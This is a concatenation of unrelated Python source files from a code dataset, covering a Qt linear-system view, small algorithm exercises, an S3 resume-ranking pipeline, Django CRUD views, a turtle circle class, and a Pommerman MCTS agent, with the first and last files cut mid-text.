лише числа!\")\n item.setText('')\n self.ui.buttonSolveSystem.setDisabled(True)\n self.Presenter.clear_variables()\n else:\n self.Presenter.change_cell(row, column, table_name, float(text))\n item.setFont(self.font)\n item.setTextAlignment(QtCore.Qt.AlignCenter)\n item.setText(text)\n\n # Встановлення таблиці змінних і інформації про час виконання\n def set_variables(self, X, eps, t):\n self.ui.tableVariables.setMaximumWidth(80 + eps * 15)\n for i in range(self.n):\n item = QtWidgets.QTableWidgetItem(str(round(X[i], eps)))\n item.setFont(self.font)\n item.setTextAlignment(QtCore.Qt.AlignCenter)\n self.ui.tableVariables.setItem(i, 0, item)\n t = str(round(t * 100, 3))\n self.ui.labelInfo.setText(\"Система розв'язана за \" + t + \" мс.\")\n\n\n\n\n","sub_path":"View.py","file_name":"View.py","file_ext":"py","file_size_in_byte":4794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"198039685","text":"def create_intervals(data):\n \"\"\"\n Create a list of intervals out of set of ints.\n \"\"\"\n if len(data) == 0:\n return []\n if len(data) == 1:\n return [data[0],data[0]]\n out = []\n d = sorted(data)\n\n curr_lower = d[0]\n curr_upper = 0\n for i in range(1, len(d)):\n if d[i]-1 == d[i-1]:\n curr_upper = d[i]\n if i == len(d)-1:\n out.append((curr_lower, curr_upper))\n else:\n out.append((curr_lower, d[i-1]))\n curr_lower = d[i]\n if i == len(d)-1:\n out.append((curr_lower, d[-1]))\n\n return sorted(list(set(out)))\n\n\n# if __name__ == '__main__':\n# # These \"asserts\" using only for self-checking and not necessary for auto-testing\n# assert create_intervals({1, 2, 3, 4, 5, 7, 8, 12}) == [\n# (1, 5), (7, 8), (12, 12)], \"First\"\n# assert create_intervals({1, 2, 3, 6, 7, 8, 4, 5}) == [(1, 8)], \"Second\"\n# print('Almost done! 
The only thing left to do is to Check it!')\n\nprint(create_intervals([]), \"WHAT SHOULD BE THE RESULT\")\nprint(create_intervals({1, 2, 3, 4, 5, 7, 8, 12}), [(1, 5), (7, 8), (12, 12)])\nprint(create_intervals({1, 2, 3, 6, 7, 8, 4, 5}), [(1, 8)])\n","sub_path":"python/create-intervals.py","file_name":"create-intervals.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"73701353","text":"\"\"\" prinzipiell völlig richtig, lösbar in Zeit aber nur durch Einbau von C \"\"\"\nfrom collections import deque\nfrom sys import stdin, stdout\ninput = stdin.readline\nprin = stdout.write\nt = int (input ())\nfor _ in range (t):\n n, m = map (int, input ().split ())\n a = deque ([0]) + deque ([int (x) for x in input ().split ()])\n d = deque ([-1 for _ in range (len (a))])\n b = deque ([0]) + deque ([int (x) for x in input ().split ()])\n for i in range (1, m + 1):\n for j in range (i, n + 1, i):\n if a [j] < b [i] and d [j] == -1: d [j] = i\n d.popleft ()\n for h in d:\n prin (str (h) + \"\\n\")\n\"\"\"\nimport subprocess\nimport os\nfrom sys import stdin,stdout\nwith open(\"code.c\",\"w\") as f:\n f.write(r'''\n #include\n #include\n int main()\n {\n int t;\n scanf(\"%d\",&t);\n while(t--)\n {\n int n,m;\n scanf(\"%d%d\",&n,&m);\n int *arr = (int *)malloc(sizeof(int)*(n+1)),*brr = (int *)malloc(sizeof(int)*(m+1));\n int *crr = (int *)malloc(sizeof(int)*(n+1));\n for(int i=1;i<=n;i++)\n {\n scanf(\"%d\",&arr[i]);\n crr[i]=-1;\n }\n for(int i=1;i<=m;i++)\n {\n scanf(\"%d\",&brr[i]);\n }\n for(int i=1;i<=m;i++)\n {\n for(int j=i;j<=n;j+=i)\n if(brr[i]>=arr[j] && crr[j]==-1)\n crr[j]=i;\n }\n for(int i=1;i<=n;i++)\n printf(\"%d\\n\",crr[i]);\n free(arr);\n free(brr);\n free(crr);\n }\n \n return 0;\n }\n ''')\nsubprocess.check_output(['gcc','code.c','-o','code'])\nprocess = 
subprocess.Popen(['./code'],stdin=stdin,stdout=subprocess.PIPE)\nprint(process.communicate()[0].decode())\n\"\"\"\n","sub_path":"hackercup_quali/hackerearth/health_of_person.py","file_name":"health_of_person.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"531128551","text":"def how_many_days(year_start, year_end):\n\tif year_start > year_end: return 0\n\tdef add_up(year, d):\n\t\tr = year % d - 1\n\t\tif r < 0: return r + d\n\t\telse: return r\n\ttotal_years = year_end - year_start + 1\n\tfour_div_years = (total_years + add_up(year_start, 4)) // 4\n\th_div_years = (total_years + add_up(year_start, 100)) // 100\n\tfh_div_years = (total_years + add_up(year_start, 400)) // 400\n\tlunar_years = four_div_years - h_div_years + fh_div_years\n\treturn (total_years - lunar_years) * 365 + lunar_years * 366\n\nimport sys\nr = sys.stdin.readline\n\ncy, cm, cd = map(int, r().split())\nny, nm, nd = map(int, r().split())\n\nif ny - cy >= 1000:\n\tif nm > cm or nm == cm and nd > cd or nm == cm and nd == cd:\n\t\tprint(\"gg\")\n\t\tsys.exit(0)\n\ndays_dict = {\n\t1:31,\n\t2:28,\n\t3:31,\n\t4:30,\n\t5:31,\n\t6:30,\n\t7:31,\n\t8:31,\n\t9:30,\n\t10:31,\n\t11:30,\n\t12:31,\n}\n\ndef is_lunar(year):\n\tif how_many_days(year, year) == 366:\n\t\treturn True\n\telse:\n\t\treturn False\n\ndef date_value_inclusive(y, m, d):\n\tbef = how_many_days(1, y-1)\n\tfor i in range(1,m): bef += days_dict[i]\n\tif m > 2 and is_lunar(y):\n\t\tbef += 1\n\treturn bef + d\n\ndef one_day_small(y,m,d):\n\tif d == 1:\n\t\tif m == 1:\n\t\t\ty -= 1\n\t\t\tm, d = 12, 31\n\t\telse:\n\t\t\tm -= 1\n\t\t\tif m == 2 and is_lunar(y): d = 29\n\t\t\telse: d = days_dict[m]\n\telse:\n\t\td -= 1\n\treturn y, m, d\n\t\ncy, cm, cd = one_day_small(cy, cm, cd)\nny, nm, nd = one_day_small(ny, nm, 
nd)\nprint(\"D-{}\".format(date_value_inclusive(ny,nm,nd)-date_value_inclusive(cy,cm,cd)))","sub_path":"1000/01308_baekjoon.py","file_name":"01308_baekjoon.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"292661097","text":"class QueryBuilder:\n def __init__(self, query, strings):\n \"\"\"Constructor of the class. Creates the attributes of the class and checks\n if the constraints are respected (see doc).\n Inputs :\n :query: A list containing strings. Corresponds to the query the user wants to do.\n This arguments must match the constraints of the \"Sparse Arrays\" problem (see doc).\n :strings: A list containing strings. Corresponds to the array the user wants to search into.\n This arguments must match the constraints of the \"Sparse Arrays\" problem (see doc).\n \"\"\"\n\n # Checks if the constraints are respected for the two inputs\n for arg_name, arg_value in {\"query\": query, \"strings\": strings}.items():\n # List type constraint\n if not isinstance(arg_value, (list, tuple)):\n raise TypeError(\"The argument \" + arg_name + \" has type \" + str(type(arg_value)) + \".\"\n + \" List or tuple was expected.\")\n if not 1 <= len(arg_value) <= 1000:\n raise TypeError(\"The argument \" + arg_name + \" has length \" + str(len(arg_value)) + \".\"\n + \" Expected a length between 1 and 1000.\")\n\n for i in range(len(arg_value)):\n # String type constraint\n if type(arg_value[i]) is not str:\n raise TypeError(\"Index \" + str(i) + \" of \" + arg_name\n + \" has type \" + str(type(arg_value[i])) + \".\"\n + \" String was expected.\")\n # Length of the strings constraint\n if not 1 <= len(arg_value[i]) <= 20:\n raise ValueError(\"Index \" + str(i) + \" of \" + arg_name\n + \" has \" + str(len(arg_value[i])) + \" characters.\"\n + \" Expected a length between 1 and 20.\")\n\n\n # Set the attributes\n self.query = query\n self.strings = strings\n\n def search(self):\n\n 
\"\"\"Searches for the number of occurrences of each queries in the strings attribute.\n Returns :\n :query_result: A dictionary with {string_query : string_occurrence}\n \"\"\"\n\n query_results = dict()\n\n for q in self.query:\n # Computes the number of occurrence of the query q in the input collection\n occurrence = self.strings.count(q)\n query_results[q] = occurrence\n\n return query_results\n","sub_path":"app/sparse_arrays.py","file_name":"sparse_arrays.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"245226759","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport warnings\nimport textract\nimport traceback\nimport extractEntities as entity\nfrom gensim.summarization import summarize\nimport PyPDF2\nimport jsonGetCategory as skills\nfrom extract_exp import ExtractExp\nfrom striprtf.striprtf import rtf_to_text\nfrom pathlib import Path\nimport json\nimport boto3\nfrom time import gmtime, strftime\nimport shutil\n\nfrom functools import partial\nimport dask\nfrom dask.diagnostics import ProgressBar\nimport numpy as np\nfrom multiprocessing import Process,Manager\n\n\nwarnings.filterwarnings(action='ignore', category=UserWarning, module='gensim')\n\nglobal rootpath\nglobal bucket_name\nbucket_name = 'resume-rank-bucket' \nrootpath = \"resume-rank-bucket\"\nglobal pathSeprator\npathSeprator = '/'\n\nclass ResultElement:\n def __init__(self, jd, filename,totalExp, phoneNo, email, exp,\n finalRank,skills,nonTechskillList,min_qual,is_min_qual,candidateName,isJobTitlePresent,badWords):\n self.jd = jd\n self.filename = filename\n self.totalExp = totalExp\n self.phoneNo = phoneNo\n self.email = email\n self.exp = exp\n self.finalRank = finalRank\n self.primarySkills = skills\n self.softSkills = nonTechskillList\n self.min_qual = min_qual\n self.is_min_qual = is_min_qual\n self.candidateName = candidateName\n self.isJobTitlePresent = isJobTitlePresent\n self.badWords = 
badWords\n \n def toJSON(self):\n return json.dumps(self, default=lambda o: o.__dict__, \n sort_keys=True, indent=4)\n\ndef getfilepath(loc):\n temp = str(loc)\n temp = temp.replace('\\\\', '/')\n return temp\n\ndef _s3_download(s3,bucket_name,path_to_read_file,i):\n try:\n s3.Bucket(bucket_name).download_file(i,path_to_read_file)\n \n except Exception as e:\n print(e)\n\ndef threaded_process(resume_chunk,final_path,jobfile,skillset,min_qual,jd_exp,resumePath,flask_return,must_have_skill,job_title,\n jd_weightage,skill_weightage,min_qual_weightage,non_tech_weightage,exp_weightage,soft_skill=\"\",programming_skill=\"\"):\n\n not_found = 'Not Found'\n extract_exp = ExtractExp()\n\n \n for count,j in enumerate(resume_chunk):\n resume_text = \"\"\n temp_path = j.rsplit('/',1)\n i = final_path+pathSeprator+temp_path[1]\n Temp = i.rsplit('.',-1)\n \n if Temp[1] == \"pdf\" or Temp[1] == \"Pdf\" or Temp[1] == \"PDF\":\n try:\n Temp_pdf = [] \n with open(i,'rb') as pdf_file:\n \n read_pdf = PyPDF2.PdfFileReader(pdf_file,strict=False)\n # page = read_pdf.getPage(0)\n # page_content = page.extractText()\n # Resumes.append(Temp_pdf)\n\n number_of_pages = read_pdf.getNumPages()\n for page_number in range(number_of_pages): \n\n page = read_pdf.getPage(page_number)\n page_content = page.extractText()\n page_content = page_content.replace('\\n', ' ')\n # page_content.replace(\"\\r\", \"\")\n Temp_pdf = str(Temp_pdf) + str(page_content)\n # Temp_pdf.append(page_content)\n # print(Temp_pdf)\n resume_text = [Temp_pdf]\n Temp_pdf = ''\n \n except Exception as e: \n print(e)\n print(traceback.format_exc())\n \n elif Temp[1] == \"rtf\" or Temp[1] == \"Rtf\" or Temp[1] == \"RTF\":\n \n try:\n \n rtf_path = Path(i)\n with rtf_path.open() as source:\n docText = rtf_to_text(source.read())\n \n c = [docText]\n resume_text = c\n \n except Exception as e: print(e)\n \n elif Temp[1] == \"docx\" or Temp[1] == \"Docx\" or Temp[1] == \"DOCX\":\n try:\n a = textract.process(i)\n a = 
a.replace(b'\\n', b' ')\n a = a.replace(b'\\r', b' ')\n b = str(a)\n c = [b]\n resume_text = c\n except Exception as e: print(e)\n \n elif Temp[1] == \"txt\" or Temp[1] == \"Txt\" or Temp[1] == \"TXT\":\n try:\n f = open(i,'r')\n lines = f.readlines()\n a = \"\\n\".join(lines)\n c = [str(a)]\n resume_text = c\n f.close()\n except Exception as e: print(e) \n \n elif Temp[1] == \"ex\" or Temp[1] == \"Exe\" or Temp[1] == \"EXE\":\n print(\"This is EXE\" , i)\n pass\n\n temptext = str(resume_text).lower()\n tttt = str(resume_text).lower()\n \n \n try:\n if(skills.dndResume(temptext,must_have_skill)):\n continue\n try:\n tttt = summarize(tttt, word_count=100)\n except Exception:\n continue\n jd_rankDict = skills.JDkeywordMatch(jobfile+skillset, temptext, jd_weightage)\n \n badWords = skills.word_polarity(temptext)\n \n min_qual_score = skills.minQualificationScore(temptext,min_qual,min_qual_weightage)\n confidence = {}\n score = int((min_qual_score/min_qual_weightage)*100)\n confidence['confidence'] = score\n if score >= 60:\n confidence['min qual'] = 'Yes'\n elif score < 60 and score > 0:\n confidence['min qual'] = 'May Be'\n else:\n confidence['min qual'] = 'No'\n is_min_qual = confidence\n \n \n resume_skill_list = skills.skillSetListMatchedWithJD(temptext.lower(),jobfile+skillset,skill_weightage,programming_skill)\n experience = extract_exp.get_features(temptext)\n temp_applicantName = entity.extractPersonName(temptext)\n bool_jobTitleFound = entity.isJobTitleAvailable(job_title, temptext)\n temp_phone = entity.extract_phone_numbers(temptext)\n if(len(temp_phone) == 0):\n Resume_phoneNo_vector = not_found\n else:\n Resume_phoneNo_vector = list(set(temp_phone))\n temp_email = entity.extract_email_addresses(temptext)\n if(len(temp_email) == 0):\n Resume_email_vector = not_found\n else:\n Resume_email_vector = list(set(temp_email))\n \n \n Resume_exp_vector = extract_exp.get_exp_weightage(str(jd_exp),experience,exp_weightage)\n \n non_tech_Score = 
skills.NonTechnicalSkillScore(temptext,jobfile+skillset,non_tech_weightage)\n Resume_non_skill_list = skills.nonTechSkillSetListMatchedWithJD(temptext,jobfile+skillset,non_tech_Score,soft_skill)\n \n final_rating = jd_rankDict.get('rank')+resume_skill_list.get('rank')+non_tech_Score+extract_exp.get_exp_weightage(str(jd_exp),experience,exp_weightage)+min_qual_score\n \n res = ResultElement(jd_rankDict,j,experience,Resume_phoneNo_vector,Resume_email_vector,\n Resume_exp_vector,round(final_rating),resume_skill_list,\n Resume_non_skill_list,min_qual_score,is_min_qual,temp_applicantName,bool_jobTitleFound,badWords)\n flask_return.append(res)\n \n except Exception:\n print(traceback.format_exc())\n\n\ndef res(jobfile,skillset,jd_exp,min_qual, job_title,input_json,aws_path,must_have_skill, s3_resource, fs, bucket_name,soft_skill=\"\",programming_skill=\"\"):\n\n LIST_OF_FILES = []\n LIST_OF_FILES_PDF = []\n LIST_OF_FILES_DOC = []\n LIST_OF_FILES_DOCX = []\n s3 = boto3.resource('s3')\n root_path='temp/'\n jd_weightage = input_json[\"weightage\"][\"jd\"]\n skill_weightage = input_json[\"weightage\"][\"skill\"]\n min_qual_weightage = input_json[\"weightage\"][\"minimum_qualification\"]\n non_tech_weightage = input_json[\"weightage\"][\"soft_skill\"]\n \n exp_weightage = 0\n if (str(input_json[\"weightage\"][\"experience\"][\"required\"]).lower() == 'true'):\n exp_weightage = input_json[\"weightage\"][\"experience\"][\"allocation\"]\n \n resumePath = bucket_name+pathSeprator+aws_path+pathSeprator+'Upload-Resume'\n \n #print('length of resume list is ', len(resume_name_inS3))\n \n for file in fs.glob(resumePath+'/*.pdf'):\n LIST_OF_FILES_PDF.append(file)\n for file in fs.glob(resumePath+'/*.doc'):\n LIST_OF_FILES_DOC.append(file)\n for file in fs.glob(resumePath+'/*.docx'):\n LIST_OF_FILES_DOCX.append(file)\n for file in fs.glob(resumePath+'/*.rtf'):\n LIST_OF_FILES_DOCX.append(file)\n for file in fs.glob(resumePath+'/*.txt'):\n LIST_OF_FILES_DOCX.append(file) \n\n 
LIST_OF_FILES = LIST_OF_FILES_DOC + LIST_OF_FILES_DOCX + LIST_OF_FILES_PDF\n print(\"Resume File list size \",len(LIST_OF_FILES))\n \"\"\" here we are creating the directory under temp folder\"\"\"\n sub_dir = aws_path.split(pathSeprator)[0]\n final_path = root_path+sub_dir+strftime(\"%H%M%S\", gmtime())\n if not os.path.exists(final_path):\n os.makedirs(final_path)\n print(\"directory created\",final_path)\n \n print(\"Resume download process starts\")\n dask.config.set(scheduler='threads', num_workers=20)\n _download = partial(_s3_download, s3,bucket_name)\n delayed_futures = [] \n for count,i in enumerate(LIST_OF_FILES):\n i = i.replace(bucket_name+pathSeprator, \"\")\n head, fileName = os.path.split(i)\n path_to_read_file = final_path+pathSeprator+fileName\n delayed_futures.append(dask.delayed(_download)(path_to_read_file,i))\n with ProgressBar():\n dask.compute(*delayed_futures) \n\n flask_return = []\n \n n_threads = 5\n inputFileSize = len(LIST_OF_FILES)\n if inputFileSize == 1 or inputFileSize == 2:\n n_threads=1\n elif inputFileSize == 3 or inputFileSize == 4 or inputFileSize == 5:\n n_threads=2\n \n array_chunk = np.array_split(LIST_OF_FILES, n_threads)\n procs = []\n print(\"Resume processing started...\")\n with Manager() as manager:\n flask_return = manager.list()\n for thr in range(n_threads):\n # print(name)\n proc = Process(target=threaded_process, args=(array_chunk[thr],final_path,jobfile,skillset,min_qual,jd_exp,resumePath,flask_return,must_have_skill,job_title,jd_weightage,skill_weightage,min_qual_weightage,non_tech_weightage,exp_weightage,soft_skill,programming_skill))\n procs.append(proc)\n proc.start()\n \n for proc in procs:\n proc.join()\n \n flask_return = list(flask_return)\n try:\n shutil.rmtree(final_path, ignore_errors=True)\n except:\n print(\"unable to delete directory \",final_path)\n\n return 
flask_return","sub_path":"jsoncore.py","file_name":"jsoncore.py","file_ext":"py","file_size_in_byte":11056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"38732379","text":"from django.shortcuts import render, get_object_or_404, redirect\r\nfrom django.http import HttpResponse, HttpResponseRedirect\r\nfrom App.forms import NewStudentForm, StudentUpdateForm\r\nfrom App.models import Student\r\nfrom django.urls import reverse\r\nfrom django.contrib import messages\r\nfrom django.contrib.auth.decorators import login_required\r\n\r\n# our homepage.\r\ndef index(request):\r\n context = {\"user\": request.user, \"state\": True}\r\n return render(request, \"App/index.html\", context)\r\n\r\n\r\n# get all student records.\r\n@login_required\r\ndef all_students(request):\r\n if request.method == \"GET\":\r\n students = Student.objects.all()\r\n if students:\r\n context = {\"data\": students, \"state\": False}\r\n return render(request, \"App/allStudents.html\", context)\r\n else:\r\n context = {\"message\": \"No student records found\", \"option\": \"add\"}\r\n return render(request, \"App/404.html\", context)\r\n else:\r\n context = {\"message\": \"POST is not allowed!\"}\r\n return render(request, \"App/404.html\", context)\r\n\r\n\r\n# adds a new student record to the database.\r\n@login_required\r\ndef add_student(request):\r\n if request.method == \"POST\":\r\n student_form = NewStudentForm(request.POST)\r\n if student_form.is_valid():\r\n cd = student_form.cleaned_data\r\n # std = get_object_or_404(Student,Registration=cd['Registration'])\r\n if Student.objects.filter(Registration=cd[\"Registration\"]).exists():\r\n\r\n # get the instance to send to error page\r\n student = Student.objects.get(Registration=cd[\"Registration\"])\r\n\r\n context = {\"message\": \"Student already exists!\", \"data\": student}\r\n return render(request, \"App/404.html\", context)\r\n else:\r\n student_form.save()\r\n student_data = 
Student.objects.get(Registration=cd[\"Registration\"])\r\n # print(\r\n # \"{} : {}\".format(student_data.FirstName, student_data.Registration)\r\n # )\r\n context = {\"data\": student_data}\r\n return render(request, \"App/studentDetails.html\", context)\r\n else:\r\n context = {\"message\": \"Invalid form! Try to add again.\"}\r\n return render(request, \"App/404.html\", context)\r\n else:\r\n return HttpResponse(\"GET is not allowed!\")\r\n\r\n\r\n# updates our student records.\r\n@login_required\r\ndef update_student(request, slug):\r\n if request.method == \"POST\":\r\n student_update_form = StudentUpdateForm(request.POST)\r\n if student_update_form.is_valid():\r\n cd = student_update_form.cleaned_data\r\n Student.objects.filter(slug=slug).update(\r\n FirstName=cd[\"FirstName\"],\r\n SecondName=cd[\"SecondName\"],\r\n Registration=cd[\"Registration\"],\r\n Hostel=cd[\"Hostel\"],\r\n LaptopSerialNumber=cd[\"LaptopSerialNumber\"],\r\n ) \r\n # send message to front-end using dajngo messages frmaework.\r\n messages.info(request, \"{} {} updated successfully!\".format(cd[\"FirstName\"],cd[\"SecondName\"]))\r\n return redirect(\"index\")\r\n\r\n else:\r\n context = {\"message\": \"Form submitted is invalid\"}\r\n return render(request, \"App/404.html\", context)\r\n else:\r\n context = {\"message\": \"GET is not allowed!\"}\r\n return render(request, \"App/404.html\", context)\r\n\r\n\r\n# deletes student instance.\r\n@login_required\r\ndef delete_student(request, reg):\r\n student = Student.objects.get(slug=reg)\r\n student.delete()\r\n messages.info(request, \"{} deleted successfully!\".format(student.FirstName))\r\n return redirect(\"index\")\r\n\r\n\r\n# searches databases for student with unipue slug.\r\n@login_required\r\ndef search_student(request, reg):\r\n if request.method == \"GET\":\r\n try:\r\n student = Student.objects.get(slug__exact=reg)\r\n if student:\r\n context = {\"data\": student, \"state\": False}\r\n return render(request, 
\"App/studentDetails.html\", context)\r\n except:\r\n context = {\"message\": \"Student not found\"}\r\n return render(request, \"App/404.html\", context)\r\n else:\r\n context = {\"message\": \"POST is not allowed!\"}\r\n return render(request, \"App/404.html\", context)\r\n\r\n","sub_path":"HGMS/App/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"76260081","text":"\n\nfrom xai.brain.wordbase.verbs._complain import _COMPLAIN\n\n#calss header\nclass _COMPLAINING(_COMPLAIN, ):\n\tdef __init__(self,): \n\t\t_COMPLAIN.__init__(self)\n\t\tself.name = \"COMPLAINING\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"complain\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_complaining.py","file_name":"_complaining.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"381855715","text":"\"\"\"\nCircle class that represents circle objects and handles exceptions\nCreated Spring 2019\nHomework 10\n@author: Ethan Walters (emw45)\n\"\"\"\n\nimport sys\nimport math\nimport turtle\n\n\nclass Circle:\n \"\"\"Initialize the Circle class constructor\"\"\"\n def __init__(self, x=0, y=0, radius=100, color='black', filled=False, window=turtle.Screen(),\n pen=turtle.Turtle()):\n if radius > 0:\n self.x = x\n self.y = y\n self.center = (x, y)\n self.radius = radius\n self.color = color\n self.filled = filled\n self.window = window\n self.pen = pen\n else:\n raise ValueError\n\n def __str__(self):\n \"\"\"Create a string method to print the Circle's current state and values\"\"\"\n\n return 'X Position: %s\\nY Position: %s\\nCenter Position: %s\\nRadius: %s' \\\n '\\nColor: %s\\nFilled: %s\\nArea: %s\\nCircumference: %s'\\\n % (self.x, self.y, self.center, self.radius, self.color, self.filled, self.get_area(),\n self.get_circumference())\n\n def 
get_area(self):\n \"\"\"Create an accessor method to get the area of the circle\"\"\"\n\n return round(math.pi * self.radius ** 2, 2)\n\n def get_circumference(self):\n \"\"\"Create an accessor method to get the circumference of the circle\"\"\"\n\n return round(2 * math.pi * self.radius, 2)\n\n def modify_radius(self, delta):\n \"\"\"Create a mutator method set the circle radius\"\"\"\n\n self.radius = delta\n\n def overlaps(self):\n \"\"\"Create a method to define which circles overlap\"\"\"\n\n distance = math.sqrt((self.x - self.x1) ** 2 + (self.y - self.y1) ** 2)\n radius1 = 130\n radii_sum = self.radius + radius1\n if distance < radii_sum:\n return True\n else:\n return False\n\n def render(self):\n \"\"\"Create a render method to draw the circle\"\"\"\n\n self.pen.hideturtle()\n self.pen.penup()\n self.pen.goto(self.center)\n self.pen.pendown()\n self.pen.circle(self.radius)\n self.window.exitonclick()\n\n\nif __name__ == '__main__':\n try:\n # Circle with sufficient values (positive radius)\n c1 = Circle(56, 34, 67, 'orange', False)\n c1.render()\n # Circle with insufficient values (negative radius)\n c2 = Circle(34, 67, -35, 'red', True)\n c2.render()\n except ValueError:\n print('Radius of circle must be greater than 0')\n sys.exit(-1)\n","sub_path":"homework10/circle.py","file_name":"circle.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"402203527","text":"import psycopg2, os, psycopg2.pool, psycopg2.extras, time\n\nclass Repo(object):\n pool = psycopg2.pool.ThreadedConnectionPool(5, 20, os.environ.get(\"DATABASE_URL\"))\n\n @classmethod\n def insert(klass, replay):\n conn = klass.pool.getconn()\n cursor = conn.cursor()\n\n query = \"INSERT INTO replays (id, url, version, map, played_at, players) values (%s, %s, %s, %s, %s, %s)\"\n arguments = [\n replay.id(),\n replay.url,\n replay.version(),\n replay.map,\n time.strftime(\"%a, %d %b %Y %H:%M:%S 
+0000\", replay.played_at),\n psycopg2.extras.Json(map(lambda player: player.to_dict(), replay.players))\n ]\n\n cursor.execute(query, arguments)\n conn.commit()\n\n klass.pool.putconn(conn)\n\n return replay\n\n @classmethod\n def one(klass, query, args):\n conn = klass.pool.getconn()\n cursor = conn.cursor()\n cursor.execute(query, args)\n\n result = cursor.fetchone()\n\n klass.pool.putconn(conn)\n\n return result\n","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"105863516","text":"from zhak_projects.interface_request.safety_inspection import doc_wsmc_wszl_modulename\nfrom zhak_projects.interface_request.safety_inspection.document_interfaces import documents_controller\nfrom zhak_projects.interface_request.safety_inspection.document_interfaces.documents_models import all_documents_models\nfrom zhak_projects.interface_request.safety_inspection.interface_exception_print import myprint\n\n\ndef interface_test_documents_list():\n \"\"\"\n 测试 文书的 list\n \"\"\"\n exceptions_module_name = []\n documents_controller.pageSize = 1\n for doc in all_documents_models():\n print(doc.controller_name)\n try:\n content = documents_controller.list(doc.controller_name)\n myprint(content)\n except:\n exceptions_module_name.append(doc.controller_name)\n print(\"error_documents\", exceptions_module_name)\n\n\n# content = generate_documents_template.list(\"docRegistCaseAudit\")\n# print(json.dumps(content, ensure_ascii=False, sort_keys=True, indent=4, separators=(', ', ': ')))\n\n\ndef interface_test_random_exportPdf():\n exceptions_module_name = []\n exceptions_module_pdfs = []\n type_code = []\n \"\"\"\n 随机抽取个guid\n \"\"\"\n documents_controller.pageSize = 1\n content = None\n for doc in all_documents_models():\n print(doc.controller_name)\n if doc.controller_name == \"doc\":\n try:\n content = documents_controller.list(\"securityCase\")\n except:\n 
exceptions_module_name.append(doc.controller_name)\n\n else:\n try:\n content = documents_controller.list(doc.controller_name)\n except:\n exceptions_module_name.append(doc.controller_name)\n \"\"\"\n pdf查找\n \"\"\"\n if content:\n if content[\"data\"][\"items\"]:\n guid = content[\"data\"][\"items\"][0][\"guid\"]\n try:\n print(guid)\n content = documents_controller.exportPdf(doc.controller_name, guid, doc.interfaces.export_pdf,\n doc.interfaces.pdf_type)\n myprint(content)\n if content:\n if content[\"code\"] == 500:\n type_code.append(doc.controller_name)\n except:\n exceptions_module_pdfs.append(doc.controller_name)\n print(\"\\033[1;31m error {} \\033[0m\".format(doc.controller_name))\n\n else:\n print(\"\\033[1;36m error {} \\033[0m\".format(\"Item Empty\"))\n\n print(\"error_documents\", exceptions_module_name)\n print(\"error_documents_pdf\", exceptions_module_pdfs)\n print(\"error_documents_pdf\", type_code)\n\n\ninterface_test_random_exportPdf()\n# interface_test_documents_list()\n","sub_path":"zhak_projects/interface_request/safety_inspection/document_interfaces/interface_test_main.py","file_name":"interface_test_main.py","file_ext":"py","file_size_in_byte":2843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"570663179","text":"import copy\nimport random\n\nfrom pommerman.constants import Action\nfrom pommerman.agents import DummyAgent\nfrom pommerman.forward_model import ForwardModel\nfrom pommerman import constants\nfrom pommerman import characters\nfrom pommerman.constants import Item, POSSIBLE_ACTIONS\n\nfrom .mcts import MCTSNode\nfrom .group05_utils import bomb_can_destroy_a_wooden_wall\n\nACCESSIBLE_TILES = [Item.Passage.value, Item.Kick.value, Item.IncrRange.value, Item.ExtraBomb.value]\n\n\nclass Node(MCTSNode):\n def __init__(self, state, agent_id):\n self.total_reward = 0\n self.visit_count = 0\n # state is a list of: 0. Board, 1. Agents, 2. Bombs, 3. Items, 4. 
Flames\n self.state = state\n self.agent_id = agent_id\n\n # here we need to think about pruning (for a particular node)\n # which action combinations do we really want to investigate in our search tree?\n self.action_combinations = [(a1, a2) for a1 in POSSIBLE_ACTIONS for a2 in POSSIBLE_ACTIONS\n if not self.prune((a1, a2))]\n self.children = dict()\n\n def prune(self, actions):\n # TODO: here you can think about more complex stategies to prune moves,\n # which allows you to create deeper search trees (very important!)\n # remember: two agents -> ids: 0 and 1\n own_agent = self.state[1][self.agent_id]\n opponent_agent = self.state[1][1 - self.agent_id]\n own_position = own_agent.position\n opponent_position = opponent_agent.position\n own_action = actions[self.agent_id]\n opponent_action = actions[opponent_agent.agent_id]\n\n # a lot of moves (e.g. bumping into a wall or wooden tile) actually result in stop moves\n # we do not have to consider, since they lead to the same result as actually playing a stop move\n if not self._is_legal_action(own_agent, own_position, own_action) or not self._is_legal_action(opponent_agent, opponent_position, opponent_action):\n return True # prune action\n\n man_dist = manhattan_dist(own_position, opponent_position)\n if man_dist > 6 and opponent_action != Action.Stop.value:\n # we do not model the opponent, if it is more than 6 steps away\n return True\n\n ## own extension\n #if own_action == Action.Bomb.value:\n # if not bomb_can_destroy_a_wooden_wall(own_position, ):\n # return True\n\n return False\n\n\n def _is_legal_action(self, agent, position, action):\n \"\"\" prune moves that lead to stop move\"\"\"\n if action == Action.Stop.value:\n return True\n board = self.state[0]\n bombs = self.state[2]\n bombs = [bomb.position for bomb in bombs]\n row = position[0]\n col 